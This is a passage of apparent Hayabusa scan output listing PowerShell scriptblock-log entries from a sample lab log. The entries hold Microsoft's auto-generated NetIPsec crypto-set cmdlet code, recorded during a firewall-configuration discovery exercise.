'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} 
